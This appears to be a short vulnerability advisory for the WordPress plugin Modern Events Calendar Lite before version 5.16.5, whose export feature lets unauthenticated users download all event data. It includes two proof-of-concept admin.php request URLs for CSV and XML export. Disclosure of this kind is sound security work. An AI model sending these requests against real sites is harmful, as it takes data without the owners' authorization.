The plugin did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example.
https://drive.google.com/file/d/1lLEXDyPp4LcKoCOqYS7A-0Yg_pIQD-ND/view?usp=sharing /wp-admin/admin.php?page=MEC-ix&tab;=MEC-export&mec-ix-action;=export-events&format;=csv /wp-admin/admin.php?page=MEC-ix&tab;=MEC-export&mec-ix-action;=export-events&format;=xml
CPE | Name | Operator | Version |
---|---|---|---|
modern-events-calendar-lite | lt | 5.16.5 |